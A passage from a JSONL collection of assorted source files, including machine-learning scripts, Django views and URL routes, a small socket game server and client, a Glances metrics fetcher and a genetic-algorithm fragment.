'UE4Editor']:\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n try:\n main()\n except:\n import traceback\n traceback.print_exc()\n","sub_path":"python/PythonEditorLaunch.py","file_name":"PythonEditorLaunch.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"341568544","text":"import warnings\nfrom sklearn.base import ClassifierMixin, BaseEstimator\nfrom sklearn.feature_selection import SelectKBest\n\nwarnings.simplefilter(action='ignore', category=FutureWarning)\n\n\nclass FeatueSelectionClf(BaseEstimator, ClassifierMixin):\n def __init__(self, base_estimator, score_function, scale_features=0.5):\n self.base_estimator = base_estimator\n self.score_function = score_function\n self.scale_features = scale_features\n self.estimator = None\n self.selected_features = None\n self.k = None\n self.feature_costs = None\n\n def fit(self, X, y):\n self.k = int((self.scale_features) * X.shape[1])\n KBest = SelectKBest(self.score_function, self.k)\n KBest = KBest.fit(X, y)\n self.selected_features = KBest.get_support()\n # self.selected_features = [False, False, False, False, False, False, False, True]\n # print(X[:, self.selected_features])\n self.estimator = self.base_estimator.fit(X[:, self.selected_features], y)\n return self\n\n def predict(self, X):\n return self.estimator.predict(X[:, self.selected_features])\n\n def predict_proba(self, X):\n return self.estimator.predict_proba(X[:, self.selected_features])\n\n def selected_features_cost(self):\n total_cost = 0\n for id, cost in enumerate(self.feature_costs):\n if self.selected_features[id]:\n total_cost += cost\n return total_cost\n","sub_path":"methods/fsclf.py","file_name":"fsclf.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"597482687","text":"import tensorflow as tf\n\n#Defines type of inputs\ninput1 = tf.placeholder(tf.float32)\ninput2 = tf.placeholder(tf.float32)\n#Defines an op which will be used for output\noutput = tf.mul(input1, input2)\n\n#FEEDS data directly into the args of session.run\nwith tf.Session() as sess:\n print(sess.run([output], feed_dict={input1:[7.], input2:[2.]}))\n\n#(works surprisingly faster)\n# output:\n# [array([ 14.], dtype=float32)]","sub_path":"basic_usage/feeds.py","file_name":"feeds.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"173433961","text":"# coding: utf-8 \nfrom server import *\nfrom labyrinthe import Labyrinthe\n\nlabyrinthe = Labyrinthe()\ntcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ntcpsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\ntcpsock.bind((\"\",1111))\n\nwhile True:\n tcpsock.listen(10)\n (clientsocket, (ip, port)) = tcpsock.accept()\n newthread = ClientThread(ip, port, clientsocket, labyrinthe)\n newthread.start()\n","sub_path":"scripts_communication/interface graphique/scripts_communication/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"497645","text":"import numpy as np\n\n#######################################################\ntable = \"\"\" |1|1.1764|4.2409|0.9750|1|\n |2|1.0400|3.8676|0.4243|1|\n |3|1.0979|1.0227|0.4484|1|\n |4|2.0411|4.7610|0.6668|-1|\n |5|2.0144|4.1217|1.2470|-1|\n |6|2.1454|4.4439|0.3974|-1| \"\"\"\n\nlambdas = np.array([1,0.7383,0,0.0411,1,0.6972])\n\nw_b = 1\nNUM_FEATURES = 3\nDECIMAL_PRECISION = 4\n#######################################################\n\ndef extract(table):\n lines = table.split('\\n')\n l = []\n for line in lines:\n elements = line.split('|')\n elements = [ a for a in elements if a.strip() ]\n l.append(elements)\n \n np_table = np.array(l)\n x = np_table[:,1:-1]\n y = np_table[:,-1]\n return len(lines), x.astype(np.float), y.astype(np.float)\n\ndef calculate_w(k, x, y, lamda):\n # x = x.astype(np.float)\n w = []\n for i in range(k):\n temp = float(y[i]) * float(lamda[i])\n w.append(temp * x[i])\n w = np.array(w)\n return w.sum(axis=0)\n \ndef calculate_wTx(k, w, x):\n w = w.reshape(1,NUM_FEATURES)\n predictions = []\n for i in range(k):\n prediction = np.matmul(w, x[i]) + 1\n predictions.append(prediction)\n return np.array(predictions)\n \n \n \nif __name__ == '__main__':\n k, x, y = extract(table)\n w = calculate_w(k, x, y, lambdas)\n print(\"\\nw=\", np.round(w,DECIMAL_PRECISION))\n print(\"\\npredictions: \\n\", np.round(calculate_wTx(k,w,x),DECIMAL_PRECISION))\n","sub_path":"4_SVMs/w_calculator.py","file_name":"w_calculator.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"347489822","text":"# %% --------------------------------------- Imports -------------------------------------------------------------------\nimport os\nimport random\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom tqdm import tqdm\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import accuracy_score, recall_score, precision_score, confusion_matrix\nfrom transformers.modeling_bert import BertForSequenceClassification\nfrom transformers.tokenization_bert import BertTokenizer\nfrom transformers import AdamW, WarmupLinearSchedule\ntokenizer = BertTokenizer.from_pretrained(\"bert-base-uncased\")\n\n# %% --------------------------------------- Set-Up --------------------------------------------------------------------\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nSEED = 42\ntorch.manual_seed(SEED)\nnp.random.seed(SEED)\nrandom.seed(SEED)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\nTRAIN, LOAD_MODEL, SAVE_MODEL = False, True, False\nFINAL_TEST = True\nEXTRACT_FEATURES = True\n\n# %% --------------------------------------- Hyper-Parameters ----------------------------------------------------------\nSEQ_LEN = 100\nN_LAYERS = 4\nN_FEATURES = 3\n\nEPOCHS = 10\nLR = 1e-5\nEPS = 1e-8\nBATCH_SIZE = 32\nCLASS_WEIGHTS = [0.1, 0.9] # First element for real, second element for fake\nWARM_UP_STEPS = 0\nGRADIENT_ACCUMULATION_STEPS = 1\n\n# %% ----------------------------------------- Helper Functions --------------------------------------------------------\ndef get_features(p, p_mask, net):\n features = np.zeros((len(p), net.cls.in_features))\n net.extract_features = True\n with torch.no_grad():\n with tqdm(total=len(p) // BATCH_SIZE + 1) as pbar:\n for batch in range(len(p) // BATCH_SIZE + 1):\n inds = slice(batch * BATCH_SIZE, (batch + 1) * BATCH_SIZE)\n if not inds:\n break\n features[inds] = net(p[inds].to(device), p_mask[inds].to(device)).cpu().numpy()\n pbar.update(1)\n return features\n\n# %% ----------------------------------------- Model Class -------------------------------------------------------------\nclass BERTForFeatures(nn.Module):\n def __init__(self, n_bert_layers=N_LAYERS, n_features=N_FEATURES, extract_features=False):\n super(BERTForFeatures, self).__init__()\n self.extract_features = extract_features\n self.bert = BertForSequenceClassification.from_pretrained(\"bert-base-uncased\")\n self.bert.bert.encoder.layer = self.bert.bert.encoder.layer[:n_bert_layers]\n self.bert.classifier = nn.Linear(768, n_features)\n self.cls = nn.Linear(n_features, 2)\n\n def forward(self, p, attn_mask):\n features, *_ = self.bert(p, attention_mask=attn_mask)\n if self.extract_features:\n return features\n return self.cls(features)\n\n# %% -------------------------------------- Data Prep ------------------------------------------------------------------\nif \"prep_data\" not in os.listdir():\n os.mkdir(\"prep_data\")\nif \"x_{}tok.npy\".format(SEQ_LEN) not in os.listdir(os.getcwd() + \"/prep_data\"):\n from data_eda import data_restaurants\n x, x_mask = [], []\n print(\"Tokenizing the reviews...\")\n with tqdm(total=len(data_restaurants)) as pbar:\n for review in data_restaurants[\"Review\"].values:\n token_ids = tokenizer.convert_tokens_to_ids(tokenizer.tokenize(review)[:SEQ_LEN-2])\n token_ids = [101] + token_ids + [102]\n n_ids = len(token_ids)\n attention_mask = [1] * n_ids\n if n_ids < SEQ_LEN:\n token_ids += [0] * (SEQ_LEN - n_ids)\n attention_mask += [0] * (SEQ_LEN - n_ids)\n x.append(token_ids)\n x_mask.append(attention_mask)\n pbar.update(1)\n x = np.array(x)\n y = LabelEncoder().fit_transform(data_restaurants[\"Fake\"].values)\n np.save(\"prep_data/x_{}tok.npy\".format(SEQ_LEN), x); np.save(\"prep_data/x_mask_{}tok.npy\".format(SEQ_LEN), x_mask)\n np.save(\"prep_data/y.npy\", y)\nelse:\n os.system(\"python3 data_eda.py\")\n x, x_mask = np.load(\"prep_data/x_{}tok.npy\".format(SEQ_LEN)), np.load(\"prep_data/x_mask_{}tok.npy\".format(SEQ_LEN))\n y = np.load(\"prep_data/y.npy\")\n\nx_train, x_test, mask_train, mask_test, y_train, y_test = train_test_split(\n x, x_mask, y, random_state=SEED, test_size=0.3, stratify=y)\nx_train, mask_train, y_train = torch.LongTensor(x_train), torch.FloatTensor(mask_train), torch.LongTensor(y_train)\nx_test, mask_test, y_test = torch.LongTensor(x_test), torch.FloatTensor(mask_test), torch.LongTensor(y_test)\n\n# %% -------------------------------------- Training Prep ----------------------------------------------------------\nmodel = BERTForFeatures().to(device)\nif \"saved_models_BERT\" not in os.listdir():\n os.mkdir(\"saved_models_BERT\")\nif LOAD_MODEL:\n try:\n model.load_state_dict(torch.load(\"saved_models_BERT/BERT_{}layers_{}features_{}len.pt\".format(N_LAYERS, N_FEATURES, SEQ_LEN)))\n print(\"A previous model was loaded successfully!\")\n except:\n print(\"Couldn't load model... Starting from scratch!\" if TRAIN else \"No model has been found... testing is kinda meaningless!\")\nif TRAIN:\n optimizer = AdamW(model.parameters(), lr=LR, eps=EPS)\n # scheduler = WarmupLinearSchedule(optimizer, warmup_steps=WARM_UP_STEPS,\n # t_total=len(x_train) // GRADIENT_ACCUMULATION_STEPS * EPOCHS)\n criterion = nn.CrossEntropyLoss(torch.FloatTensor(CLASS_WEIGHTS).to(device))\n\n# %% -------------------------------------- Training Loop ----------------------------------------------------------\nif TRAIN:\n recall_test_best = 0\n inds_list = list(range(len(x_train)))\n print(\"Starting training loop...\")\n for epoch in range(EPOCHS):\n\n random.shuffle(inds_list)\n loss_train, steps_train, labels_pred, labels_real = 0, 0, [], []\n model.train()\n total = len(x_train) // BATCH_SIZE + 1\n with tqdm(total=total, desc=\"Epoch {}\".format(epoch)) as pbar:\n for inds in [inds_list[batch * BATCH_SIZE:(batch + 1) * BATCH_SIZE] for batch in\n range(len(inds_list) // BATCH_SIZE + 1)]:\n if not inds:\n break\n optimizer.zero_grad()\n logits = model(x_train[inds].to(device), mask_train[inds].to(device))\n loss = criterion(logits, y_train[inds].to(device))\n loss.backward()\n optimizer.step()\n # scheduler.step()\n loss_train += loss.cpu().item()\n steps_train += 1\n pbar.update(1)\n labels_pred += list(np.argmax(logits.detach().cpu().numpy(), axis=1).reshape(-1))\n labels_real += list(y_train[inds].numpy().reshape(-1))\n pbar.set_postfix_str(\"Training Loss: {:.5f}, Precision: {:.2f}, Recall: {:.2f}\".format(\n loss_train / steps_train, precision_score(labels_real, labels_pred), recall_score(labels_real, labels_pred))\n )\n acc_train = accuracy_score(labels_real, labels_pred)\n prec_train = precision_score(labels_real, labels_pred)\n recall_train = recall_score(labels_real, labels_pred)\n cf_train = confusion_matrix(labels_real, labels_pred)\n\n loss_test, steps_test, labels_pred, labels_real = 0, 0, [], []\n model.eval()\n total = len(x_test) // BATCH_SIZE + 1\n with torch.no_grad():\n with tqdm(total=total, desc=\"Epoch {}\".format(epoch)) as pbar:\n for batch in range(len(x_test) // BATCH_SIZE + 1):\n inds = slice(batch * BATCH_SIZE, (batch + 1) * BATCH_SIZE)\n logits = model(x_test[inds].to(device), mask_test[inds].to(device))\n loss = criterion(logits, y_test[inds].to(device))\n loss_test += loss.cpu().item()\n steps_test += 1\n pbar.update(1)\n labels_pred += list(np.argmax(logits.detach().cpu().numpy(), axis=1).reshape(-1))\n labels_real += list(y_test[inds].numpy().reshape(-1))\n pbar.set_postfix_str(\"Testing Loss: {:.5f}, Precision: {:.2f}, Recall: {:.5f}\".format(\n loss_train / steps_train, precision_score(labels_real, labels_pred), recall_score(labels_real, labels_pred))\n )\n acc_test = accuracy_score(labels_real, labels_pred)\n prec_test = precision_score(labels_real, labels_pred)\n recall_test = recall_score(labels_real, labels_pred)\n cf_test = confusion_matrix(labels_real, labels_pred)\n\n print(\"Epoch {} | Train Loss {:.5f}, Acc {:.2f}, Precision {:.2f}, Recall {:.2f}\"\n \" - Test Loss {:.5f}, Acc {:.2f}, Precision {:.2f}, Recall {:.2f}\".format(\n epoch, loss_train / steps_train, acc_train, prec_train, recall_train, loss_test / steps_test, acc_test, prec_test, recall_test))\n print(cf_train)\n print(cf_test)\n\n if recall_test > recall_test_best and SAVE_MODEL:\n torch.save(model.state_dict(), \"saved_models_BERT/BERT_{}layers_{}features_{}len.pt\".format(N_LAYERS, N_FEATURES, SEQ_LEN))\n print(\"A new model has been saved!\")\n recall_test_best = recall_test\n\n# %% ----------------------------------------- Final Test --------------------------------------------------------------\nif FINAL_TEST:\n print(\"Computing metrics on test set...\")\n labels_pred, labels_real = [], []\n model.eval()\n with torch.no_grad():\n with tqdm(total=len(x_test) // BATCH_SIZE + 1) as pbar:\n for batch in range(len(x_test) // BATCH_SIZE + 1):\n inds = slice(batch * BATCH_SIZE, (batch + 1) * BATCH_SIZE)\n logits = model(x_test[inds].to(device), mask_test[inds].to(device))\n pbar.update(1)\n labels_pred += list(np.argmax(logits.detach().cpu().numpy(), axis=1).reshape(-1))\n labels_real += list(y_test[inds].numpy().reshape(-1))\n print(\"Test Acc {:.2f}, Test Recall {:.2f}\".format(accuracy_score(labels_real, labels_pred), recall_score(labels_real, labels_pred)))\n print(confusion_matrix(labels_real, labels_pred))\n\n# %% ----------------------------------------- Save Features -----------------------------------------------------------\nif EXTRACT_FEATURES:\n if \"saved_features_BERT\" not in os.listdir():\n os.mkdir(\"saved_features_BERT\")\n print(\"Saving BERT last cls weights...\")\n with open(\"BERT_last_weights{}layers_{}features_{}len.txt\".format(N_LAYERS, N_FEATURES, SEQ_LEN), \"w\") as s:\n s.write(str(model.cls.weight.data.cpu().numpy()))\n print(\"Extracting and saving features...\")\n features_train, features_test = get_features(x_train, mask_train, model), get_features(x_test, mask_test, model)\n np.save(\"saved_features_BERT/features_train_{}layers_{}features_{}len.npy\".format(N_LAYERS, N_FEATURES, SEQ_LEN), features_train)\n np.save(\"saved_features_BERT/features_test_{}layers_{}features_{}len.npy\".format(N_LAYERS, N_FEATURES, SEQ_LEN), features_test)\n print(\"The features have been saved!\")\n","sub_path":"AllUsers/BERT_features.py","file_name":"BERT_features.py","file_ext":"py","file_size_in_byte":11265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"396244344","text":"class MyError(Exception):\n def __init__(self, *args):\n print('calling init')\n if args:\n self.message = args[0]\n else:\n self.message = None\n\n def __str__(self):\n print('Calling str')\n if self.message:\n return \"Here's MyError exception with message: {0}\".format(self.message)\n else:\n return \"Here's a MyError exception\"\n\n\nraise MyError()\n# raise MyError('Houston, we have a problem')\n","sub_path":"Courses/PythonBeyondTheBasics(OO-Programming)_David-Blaikie/7_ExceptionHandling/MyError.py","file_name":"MyError.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"122231266","text":"import numpy as np\nimport pandas as pd\nimport beacon8 as bb8\nimport beacon8.optimizers as optim\nfrom os.path import dirname, join as pjoin\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.cross_validation import train_test_split\nfrom train import train\nfrom test import validate\n\n\ndef load_train_data():\n train_data = pd.read_csv(pjoin(dirname(__file__), 'data', 'train.csv'))\n labels = train_data.target.values\n labels = LabelEncoder().fit_transform(labels)\n train_data = train_data.drop('id', axis=1)\n train_data = train_data.drop('target', axis=1)\n return train_data.as_matrix(), labels\n\ndef nnet():\n model = bb8.Sequential()\n model.add(bb8.AddConstant(1.0))\n model.add(bb8.Log())\n model.add(bb8.BatchNormalization(93))\n model.add(bb8.Dropout(0.1))\n model.add(bb8.Linear(93, 512))\n model.add(bb8.BatchNormalization(512))\n model.add(bb8.ReLU())\n model.add(bb8.Dropout(0.5))\n\n model.add(bb8.Linear(512, 512))\n model.add(bb8.BatchNormalization(512))\n model.add(bb8.ReLU())\n model.add(bb8.Dropout(0.5))\n\n model.add(bb8.Linear(512, 512))\n model.add(bb8.BatchNormalization(512))\n model.add(bb8.ReLU())\n model.add(bb8.Dropout(0.5))\n\n model.add(bb8.Linear(512, 9))\n model.add(bb8.SoftMax())\n return model\n\nif __name__ == \"__main__\":\n if __package__ is None: # PEP366\n __package__ = \"beacon8.examples.KaggleOtto\"\n\n train_data_x, train_data_y = load_train_data()\n\n train_data_x, valid_data_x, train_data_y, valid_data_y = train_test_split(train_data_x, train_data_y, train_size=0.85)\n model = nnet()\n\n criterion = bb8.ClassNLLCriterion()\n\n optimiser = optim.Momentum(lr=0.01, momentum=0.9)\n\n for epoch in range(1, 1001):\n model.training()\n if epoch % 100 == 0:\n optimiser.hyperparams['lr'] /= 10\n train(train_data_x, train_data_y, model, optimiser, criterion, epoch, 100, 'train')\n train(train_data_x, train_data_y, model, optimiser, criterion, epoch, 100, 'stats')\n\n model.evaluate()\n validate(valid_data_x, valid_data_y, model, epoch, 100)\n\n","sub_path":"examples/Kaggle-Otto/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"275363412","text":"'''\nCreated on Jan 17, 2013\n\n@author: ayush\n'''\n\nimport os\nimport sys\n\ndef fix_path(path):\n offset = 0\n if path[-1] != '/':\n path = path + '/'\n if path[0] == '/':\n offset = 1\n idx = path.find('/', offset)\n while idx != -1:\n try:\n if not os.path.exists(path[:idx]):\n os.makedirs(path)\n idx = path.find('/', idx + 1)\n except:\n sys.exit(\"Unable to create path: \" + path[:idx + 1])","sub_path":"Corpus Generator/Scrapy/TOI_Crawler/path_fixer.py","file_name":"path_fixer.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"473286093","text":"import json\nimport multiprocessing\nimport sys\nsys.path.append('../')\n\nfrom sharings.AsyncioRequests import AsyncioRequests\nfrom glancesapi.ProcessGlances import ProcessGlances\nfrom sharings.utils import parse_nodelist\n\n\ndef fetch_glances(glances_config: dict) -> list:\n \"\"\"\n fetch OS metrics from glances API. \n Examples of using glances API:\n curl http://10.10.1.4:61208/api/3/pluginslist | python -m json.tool\n curl http://10.10.1.4:61208/api/3/percpu | python -m json.tool\n \"\"\"\n all_datapoints = []\n try:\n api = glances_config[\"api\"]\n port = glances_config[\"port\"]\n nodes = parse_nodelist(glances_config[\"nodelist\"])\n\n # Generate glances API urls for the specified nodes\n urls = [\"http://\" + node + \":\" + str(port) + api for node in nodes]\n\n # Asynchronously fetch glances metrics from all nodes\n glances = AsyncioRequests()\n node_metrics = glances.bulk_fetch(urls, nodes)\n\n # Process metrics and generate data points using multiprocessing\n with multiprocessing.Pool() as pool:\n datapoints = pool.map(process_metric, node_metrics)\n\n # Flatten the datapoints\n all_datapoints = [item for sublist in datapoints for item in sublist]\n\n return all_datapoints\n\n except Exception as e:\n print(e)\n\n\ndef process_metric(node_metric: dict) -> list:\n process = ProcessGlances(node_metric)\n datapoints = process.get_datapoints()\n return datapoints","sub_path":"glancesapi/fetch_glances.py","file_name":"fetch_glances.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"53958351","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom pprint import pprint\nfrom django.forms.models import model_to_dict\n\nfrom models import *\n\nLOGIN_TARGET = \"trading/\"\n\n# Create your views here.\ndef index(response):\n if \"user\" in response.session:\n return redirect(\"/\"+LOGIN_TARGET)\n messagelist = messages.get_messages(response).__iter__()\n try:\n header = messagelist.next()\n except StopIteration:\n header = \"\"\n rest = []\n for message in messagelist:\n rest.append(message)\n return render(response, \"users/index.html\", {\"header\":header, \"rest\":rest})\n\ndef register(response):\n user, errors = User.objects.register(response.POST)\n if user is not None:\n messages.success(response, \"Successfully registered!\")\n response.session[\"user\"] = {\"id\":user.id, \"name\":user.username}\n return redirect(\"/\"+LOGIN_TARGET)\n else:\n messages.error(response, \"There were errors with your registration:\")\n for error in errors:\n messages.error(response, error)\n return redirect(\"/\")\n\ndef login(response):\n result = User.objects.tryLogin(response.POST[\"username\"], response.POST[\"password\"])\n if (type(result) is User):\n messages.success(response, \"Successfully logged in!\")\n response.session[\"user\"] = {\"id\":result.id, \"name\":result.username}\n return redirect(\"/\"+LOGIN_TARGET)\n else:\n messages.error(response, result)\n return redirect(\"/\")\n\ndef logout(response):\n del response.session[\"user\"]\n return redirect(\"/\")\n","sub_path":"apps/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"650196582","text":"from pprint import pprint\ndef count(l, rows, cols):\n\tleft = [[0]*cols for i in range(rows)]\n\tright = [[0]*cols for i in range(rows)]\n\tantidiag = [[0]*cols for i in range(rows)]\n\n\tfor i in range(rows):\n\t\tfor j in range(cols):\n\t\t\tif(l[i][j] == 'z'):\n\t\t\t\tleft[i][j] = 1\n\t\t\t\tright[i][j] = 1\n\t\t\t\tantidiag[i][j] = 1\n\n\tfor i in range(rows):\n\t\tfor j in range(1, cols):\n\t\t\tif(l[i][j] == 'z'):\n\t\t\t\tleft[i][j] = left[i][j - 1] + 1\n\n\tfor i in range(rows):\n\t\tfor j in range(cols - 2, -1, -1):\n\t\t\tif(l[i][j] == 'z'):\n\t\t\t\tright[i][j] = right[i][j + 1] + 1\n\n\tfor i in range(rows - 2, -1, -1):\n\t\tfor j in range(cols - 1, 0, -1):\n\t\t\tif(l[i][j] == 'z'):\n\t\t\t\tantidiag[i][j] = antidiag[i + 1][j - 1] + 1\n\n\t# pprint(left)\n\t# pprint(right)\n\t# pprint(antidiag)\n\tans = 0\n\tfor i in range(rows):\n\t\tfor j in range(cols):\n\t\t\tif(l[i][j] == 'z'):\n\t\t\t\tk = 0\n\t\t\t\twhile(k < min(left[i][j], antidiag[i][j])):\n\t\t\t\t\tif(j - k >= 0 and i + k < rows):\n\t\t\t\t\t\tif(k < right[i + k][j - k]):\n\t\t\t\t\t\t\tans += 1\n\t\t\t\t\telse:\n\t\t\t\t\t\tbreak\n\t\t\t\t\tk += 1\n\t\tprint(\"i = %d, j = %d, k = %d, ans = %d\"%(i, j, k, ans))\n\treturn ans\n\nif(__name__ == \"__main__\"):\n\t# rows, cols = [int(t) for t in raw_input().split(' ')]\n\trows, cols = 2000, 2000\n\tl = []\n\tfor i in range(rows):\n\t\t# l.append(raw_input())\n\t\tl.append('z' * 2000)\n\tprint(count(l, rows, cols))","sub_path":"online_judge/codeforces/628, Educational Codeforces Round 8/E. Zbazi in Zeydabad.py","file_name":"E. Zbazi in Zeydabad.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"441745321","text":"import asyncore,socket, sys, time\r\n\r\nTCP_IP ='127.0.0.1'\r\nPORT = 5000\r\nMESSAGE = \"ping\"\r\nBUFFER_SIZE =1024\r\n\r\n\r\ndef client():\r\n cnt =0\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock.connect((TCP_IP, PORT))\r\n #global MESSAGE\r\n msg = sys.argv[1] + \":\" + MESSAGE\r\n while True:\r\n sock.send(msg.encode())\r\n recv_data = sock.recv(BUFFER_SIZE)\r\n cnt += 1\r\n print(\"Sending Data:\", MESSAGE)\r\n print(\"Received Data:\", recv_data.decode())\r\n time.sleep(int(sys.argv[2]))\r\n if (cnt >= int(sys.argv[3])): \r\n sock.close()\r\n print('Connection Closed')\r\n break\r\n\r\nclient()","sub_path":"TCP/tcp_client.py","file_name":"tcp_client.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"203997512","text":"from django.urls import path,re_path\nfrom django.conf.urls import url\nfrom . import views\nurlpatterns=[\n url(r'^$',views.index,name='pac_index'),\n url('^dpp_allocation/(?P\\d+)/update/$',views.update_DPP_Allocation,name='dpp_allocation_update'),\n url('^dpp_allocation/(?P\\d+)/delete/$',views.delete_DPP_Allocation,name='dpp_allocation_delete'),\n url('^dpp_allocation/create/$', views.create_DPP_Allocation, name='dpp_allocation_create'),\n url(r'^input_budget_allocation', views.input_budget_allocation, name='budget_allocation'),\n url('^budget_allocation/(?P\\d+)/update/$',views.update_Budget_Allocation,name='budget_allocation_update'),\n url('^budget_allocation/(?P\\d+)/delete/$',views.delete_DPP_Allocation,name='budget_allocation_delete'),\n url('^budget_allocation/(?P\\d+)/list/$',views.list_budget_item_sort_by_fy,name='budget_allocation_yearwise'),\n #Invoice Related URL\n url('^upload_invoice_image',views.Invoice_image_upload,name='upload_invoice_image'),\n url('^invoice_index',views.invoice_list,name='invoice_index'),\n url('^invoice/(?P\\d+)/update/$',views.Edit_invoice,name='update_invoice'),\n url('^invoice/(?P\\d+)/delete/$',views.Delete_invoice,name='delete_invoice'),\n url('^invoice/add/$',views.Add_invoice,name='create_invoice'),\n url('^invoice/(?P\\d+)/yearwise/$',views.list_invoices_sort_by_fy,name='invoice_yearwise'),\n\n\n url('^invoice/sort/all/$',views.invoice_list_sort_by_all,name='invoice_sort'),\n\n\n url('^invoice/sort/all/$',views.invoice_list_sort_by_all,name='invoice_sort'),\n\n #Expediture Related URL\n url('^expenditure/(?P\\d+)/add/$',views.Add_Expenditure,name='create_expediture'),\n url('^expenditure/(?P\\d+)/update/$',views.UpdateExpenditure,name='edit_expenditure'),\n url('^expenditure/(?P\\d+)/delete/$',views.DeleteExpenditure,name='delete_expenditure'),\n url('^expenditure_index',views.expenditure_list,name='expenditure_index'),\n url('^expenditure/(?P\\d+)/list/$',views.expenditure_list_sort_by_fy,name='expenditure_yearwise'),\n url('^expenditure/(?P\\d+)/invoice/$',views.expenditure_list_sort_by_invoice,name='expenditure_invoicewise'),\n url('^expenditure/sort/all/$',views.expenditure_list_sort_by_all,name='expenditure_sort'),\n url('^expenditure/report/$',views.progressReport,name='progress_report'),\n #PD Dash Board for financial progress\n url('^financial/progress/category/$',views.dashboardCategory,name=\"dashboard_category\"),\n\n]\n","sub_path":"pac/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"594255723","text":"import numpy as np\r\nimport random\r\nimport math\r\nimport copy\r\nimport matplotlib.pyplot as plt\r\nclass Ind():\r\n def __init__(self):\r\n self.fitness = 0\r\n self.x = np.zeros(20)\r\n self.place = 0\r\n self.x1 = 0\r\n self.x2 = 0\r\n\r\ndef Cal_fit(x, upper, lower): #计算适应度值函数\r\n Temp1 = 0\r\n for i in range(10):\r\n Temp1 += x[i] * math.pow(2, i)\r\n Temp2 = 0\r\n for i in range(10, 20, 1):\r\n Temp2 += math.pow(2, i - 10) * x[i]\r\n x1 = lower[0] + Temp1 * (upper[0] - lower[0])/(math.pow(2, 10) - 1)\r\n x2 = lower[1] + Temp2 * (upper[1] - lower[1])/(math.pow(2, 10) - 1)\r\n if x1 > upper[0]:\r\n x1 = random.uniform(lower[0], upper[0])\r\n if x2 > upper[1]:\r\n x2 = random.uniform(lower[1], upper[1])\r\n return 4*x1**2-2.1*x1**4+(1/3)*x1**6+x1*x2-4*x2**2+4*x2**4\r\n\r\n\r\ndef Init(G, upper, lower, Pop): #初始化函数\r\n for i in range(Pop):\r\n for j in range(20):\r\n G[i].x[j] = random.randint(0, 1)\r\n G[i].fitness = Cal_fit(G[i].x, upper, lower)\r\n G[i].place = i\r\ndef Find_Best(G, Pop):\r\n Temp = copy.deepcopy(G[0])\r\n for i in range(1, Pop, 1):\r\n if G[i].fitness > Temp.fitness:\r\n Temp = copy.deepcopy(G[i])\r\n return Temp\r\n\r\ndef Selection(G, Gparent, Pop, Ppool): #选择函数\r\n fit_sum = np.zeros(Pop)\r\n fit_sum[0] = G[0].fitness\r\n for i in range(1, Pop, 1):\r\n fit_sum[i] = G[i].fitness + fit_sum[i - 1]\r\n fit_sum = fit_sum/fit_sum.max()\r\n for i in range(Ppool):\r\n rate = random.random()\r\n Gparent[i] = copy.deepcopy(G[np.where(fit_sum > rate)[0][0]])\r\n\r\ndef Cross_and_Mutation(Gparent, Gchild, Pc, Pm, upper, lower, Pop, Ppool): #交叉和变异\r\n for i in range(Ppool):\r\n place = random.sample([_ for _ in range(Ppool)], 2)\r\n parent1 = copy.deepcopy(Gparent[place[0]])\r\n parent2 = copy.deepcopy(Gparent[place[1]])\r\n parent3 = copy.deepcopy(parent2)\r\n if random.random() < Pc:\r\n num = random.sample([_ for _ in range(1, 19, 1)], 2)\r\n num.sort()\r\n if random.random() < 0.5:\r\n for j in range(num[0], num[1], 1):\r\n parent2.x[j] = parent1.x[j]\r\n else:\r\n for j in range(0, num[0], 1):\r\n parent2.x[j] = parent1.x[j]\r\n for j in range(num[1], 20, 1):\r\n parent2.x[j] = parent1.x[j]\r\n num = random.sample([_ for _ in range(1, 19, 1)], 2)\r\n num.sort()\r\n num.sort()\r\n if random.random() < 0.5:\r\n for j in range(num[0], num[1], 1):\r\n parent1.x[j] = parent3.x[j]\r\n else:\r\n for j in range(0, num[0], 1):\r\n parent1.x[j] = parent3.x[j]\r\n for j in range(num[1], 20, 1):\r\n parent1.x[j] = 